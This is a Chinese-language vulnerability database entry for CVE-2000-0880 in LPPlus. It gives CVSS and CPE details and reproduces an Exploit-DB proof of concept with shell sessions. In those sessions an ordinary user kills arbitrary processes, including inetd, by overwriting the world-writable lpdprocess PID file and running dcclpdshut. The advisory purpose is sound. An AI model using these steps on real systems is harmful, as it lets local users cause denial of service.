CVE-2000-0880
CVSS3.6
发布时间 :2000-11-14 00:00:00
修订时间 :2008-09-05 16:22:06
NMCOE    

[原文]LPPlus creates the lpdprocess file with world-writeable permissions, which allows local users to kill arbitrary processes by specifying an alternate process ID and using the setuid dcclpdshut program to kill the process that was specified in the lpdprocess file.


[CNNVD]LPPlus许可DoS漏洞(CNNVD-200011-021)

        LPPlus创建带有全域可写权限的lpdprocess文件。本地用户通过指明交替的进程ID且使用setuid dcclpdshut程序中断lpdprocess文件中指定的进程从而中断任意进程。
        

- CVSS (基础分值)

CVSS分值: 3.6 [轻微(LOW)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:plus_technologies:lpplus:3.2.2
cpe:/a:plus_technologies:lpplus:3.3

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0880
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0880
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200011-021
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/static/5200.php
(UNKNOWN)  XF  lpplus-process-perms-dos
http://www.securityfocus.com/bid/1643
(VENDOR_ADVISORY)  BID  1643
http://archives.neohapsis.com/archives/bugtraq/2000-08/0531.html
(VENDOR_ADVISORY)  BUGTRAQ  20000906 Multiple Security Holes in LPPlus

- 漏洞信息

LPPlus许可DoS漏洞
低危 访问验证错误
2000-11-14 00:00:00 2005-10-20 00:00:00
本地  
        LPPlus创建带有全域可写权限的lpdprocess文件。本地用户通过指明交替的进程ID且使用setuid dcclpdshut程序中断lpdprocess文件中指定的进程从而中断任意进程。
        

- 公告与补丁

        Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- 漏洞信息 (20192)

LPPlus 3.2.2/3.3 Permissions DoS Vulnerabilities (EDBID:20192)
unix local
2000-09-06 Verified
0 Dixie Flatline
N/A [点击下载]
source: http://www.securityfocus.com/bid/1643/info

Vulnerability #1: Several files that are part of the LPPlus print management system are installed setuid root by default. These files include:

$LPHOME/bin/dccsched 
$LPHOME/bin/dcclpdser 
$LPHOME/bin/dccbkst 

These start the scheduler, LPD server and network status daemons.

$LPHOME/bin/dccshut 
$LPHOME/bin/dcclpdshut 
$LPHOME/bin/dccbkstshut

These stop the same services.

By default, all six may be run by a user of any privilege level, allowing any user to start and stop printing services, regardless of userid or group.

Vulnerability #2: $LPHOME/system/lpdprocess is created mode 777. This file contains the process ID of the dcclpdser process. If a user replaces the PID in $LPHOME/system/lpdprocess with the PID of a target process, then runs $LPHOME/bin/dcclpdshut, the combination of this file's permissions, and the fact that dcclpdshut is executable by any user, allows any user to send signal 2 (SIGINT) to, thereby shutting down, any process.

Vulnerability #1: 

$ id
uid=600(test) gid=300(users)
$ ps -ef|grep dcc
test 26357 26351 0 18:18:06 pts/0 0:00 grep dcc
root 26262 1 0 17:41:50 ? 0:01 /opt/lpplus/bin/dccsched
root 26272 1 0 17:42:03 ? 0:00 /opt/lpplus/bin/dcclpdser
root 26276 1 0 17:42:14 ? 0:00 /opt/lpplus/bin/dccbkst
$ dccbkstshut
$ dcclpdshut
LPD048E Signal sent to dcclpdser to shut down.
$ dccshut
LPP054I LP Plus scheduler ordered to shutdown.
$ ps -ef|grep dcc 
test 26253 26239 0 17:39:45 pts/0 0:00 grep dcc 
$

Vulnerability #2

$ id
uid=600(test) gid=300(users)
$ ps -ef|grep inet
test 26285 26279 0 17:42:42 pts/0 0:00 grep inet
root 12276 1 0 Aug 22 ? 0:00 /usr/sbin/inetd -s
$ cat > $LPHOME/system/lpdprocess
12276
^D
$ dcclpdshut
LPD048E Signal sent to dcclpdser to shut down.
$ ps -ef|grep inet
test 26291 26279 0 17:45:17 pts/0 0:00 grep inet
$		

- 漏洞信息

13739
LPPlus lpdprocess File Permission Weakness Arbitrary Process Termination
Local Access Required Denial of Service
Loss of Availability Solution Unknown
Exploit Public Third-party Verified

- 漏洞描述

- 时间线

2000-09-06 Unknow
Unknow Unknow

- 解决方案

OSVDB is not aware of a solution for this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站